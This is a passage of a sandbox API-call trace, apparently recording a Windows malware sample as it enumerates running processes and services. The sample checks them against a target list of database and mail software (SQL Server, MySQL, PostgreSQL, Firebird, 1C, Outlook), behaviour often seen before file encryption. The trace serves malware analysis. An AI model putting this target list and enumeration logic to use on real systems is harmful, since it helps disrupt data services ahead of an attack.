-1 [0270.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0270.944] lstrlenW (lpString="Spooler") returned 7 [0270.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0270.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0270.944] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0270.944] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0270.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0270.944] lstrlenW (lpString="SysMain") returned 7 [0270.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0270.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0270.944] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0270.944] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0270.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0270.944] lstrlenW (lpString="Themes") returned 6 [0270.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0270.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0270.944] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0270.944] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0270.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0270.944] lstrlenW (lpString="TrkWks") returned 6 [0270.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0270.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0270.945] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0270.945] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0270.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0270.945] lstrlenW (lpString="UxSms") returned 5 [0270.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0270.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0270.945] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0270.945] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0270.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0270.945] lstrlenW (lpString="Winmgmt") returned 7 [0270.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0270.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0270.945] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0270.945] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0270.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0270.945] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0270.945] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0270.946] Process32FirstW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.946] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0270.946] lstrlenW (lpString="System") returned 6 [0270.946] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0270.946] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0270.946] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0270.947] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0270.947] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0270.947] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0270.947] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0270.947] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0270.947] lstrlenW (lpString="smss.exe") returned 8 [0270.947] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0270.947] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0270.947] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0270.947] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0270.947] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0270.947] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0270.947] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0270.947] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.947] lstrlenW (lpString="csrss.exe") returned 9 [0270.947] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0270.947] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0270.947] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0270.947] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0270.947] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0270.947] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0270.948] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0270.948] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0270.948] lstrlenW (lpString="wininit.exe") returned 11 [0270.948] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0270.948] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0270.948] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0270.948] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0270.948] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0270.948] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0270.948] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0270.948] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.948] lstrlenW (lpString="csrss.exe") returned 9 [0270.948] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0270.948] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0270.948] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0270.948] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0270.948] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0270.948] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0270.948] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0270.948] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0270.949] lstrlenW (lpString="winlogon.exe") returned 12 [0270.949] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0270.949] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0270.949] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0270.949] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0270.949] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0270.949] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0270.949] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0270.949] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0270.949] lstrlenW (lpString="services.exe") returned 12 [0270.949] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0270.949] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0270.949] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0270.949] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0270.949] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0270.949] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0270.949] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0270.949] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0270.950] lstrlenW (lpString="lsass.exe") returned 9 [0270.950] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0270.950] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0270.950] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0270.950] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0270.950] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0270.950] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0270.950] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0270.950] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0270.950] lstrlenW (lpString="lsm.exe") returned 7 [0270.950] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0270.950] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0270.950] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0270.950] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0270.950] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0270.950] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0270.950] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0270.950] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.951] lstrlenW (lpString="svchost.exe") returned 11 [0270.951] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.951] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.951] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.951] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.951] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.951] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.951] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.951] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.951] lstrlenW (lpString="svchost.exe") returned 11 [0270.951] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.951] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.951] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.951] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.951] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.952] lstrlenW (lpString="svchost.exe") returned 11 [0270.952] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.952] lstrlenW (lpString="svchost.exe") returned 11 [0270.952] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.952] lstrlenW (lpString="svchost.exe") returned 11 [0270.952] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0270.952] lstrlenW (lpString="audiodg.exe") returned 11 [0270.952] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.953] lstrlenW (lpString="svchost.exe") returned 11 [0270.953] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.953] lstrlenW (lpString="svchost.exe") returned 11 [0270.953] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0270.953] lstrlenW (lpString="userinit.exe") returned 12 [0270.953] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0270.953] lstrlenW (lpString="dwm.exe") returned 7 [0270.953] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0270.954] lstrlenW (lpString="explorer.exe") returned 12 [0270.954] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0270.954] lstrlenW (lpString="spoolsv.exe") returned 11 [0270.954] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0270.954] lstrlenW (lpString="taskhost.exe") returned 12 [0270.954] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.955] lstrlenW (lpString="svchost.exe") returned 11 [0270.955] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0270.955] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0270.955] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0270.955] lstrlenW (lpString="reader_sl.exe") returned 13 [0270.955] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0270.955] CloseHandle (hObject=0x210) returned 1 [0270.955] Sleep (dwMilliseconds=0x1f4) [0271.780] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea330 [0271.837] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0271.895] GetLastError () returned 0xea [0271.895] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe90) returned 0x3dec5a0 [0271.895] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xe90, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0272.013] CloseServiceHandle (hSCObject=0x47ea330) returned 1 [0272.014] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0272.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.014] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0272.014] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0272.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0272.014] lstrlenW (lpString="AudioSrv") returned 8 [0272.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0272.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0272.014] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0272.014] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0272.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0272.014] lstrlenW (lpString="BFE") returned 3 [0272.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0272.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0272.014] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0272.014] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0272.014] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0272.014] lstrlenW (lpString="CryptSvc") returned 8 [0272.014] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0272.014] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0272.014] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0272.014] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0272.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0272.015] lstrlenW (lpString="CscService") returned 10 [0272.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0272.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0272.015] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0272.015] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0272.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0272.015] lstrlenW (lpString="DcomLaunch") returned 10 [0272.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.015] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0272.015] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0272.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0272.015] lstrlenW (lpString="Dhcp") returned 4 [0272.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0272.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0272.015] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0272.015] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0272.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0272.015] lstrlenW (lpString="Dnscache") returned 8 [0272.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0272.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0272.015] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0272.015] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0272.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0272.015] lstrlenW (lpString="DPS") returned 3 [0272.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0272.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0272.015] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0272.015] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0272.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0272.015] lstrlenW (lpString="eventlog") returned 8 [0272.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0272.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0272.015] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0272.016] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0272.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0272.016] lstrlenW (lpString="EventSystem") returned 11 [0272.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0272.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0272.016] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0272.016] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0272.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0272.016] lstrlenW (lpString="gpsvc") returned 5 [0272.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0272.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0272.016] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0272.016] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0272.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0272.016] lstrlenW (lpString="iphlpsvc") returned 8 [0272.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0272.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0272.016] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0272.016] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0272.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0272.016] lstrlenW (lpString="LanmanServer") returned 12 [0272.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0272.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0272.016] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0272.016] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0272.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0272.016] lstrlenW 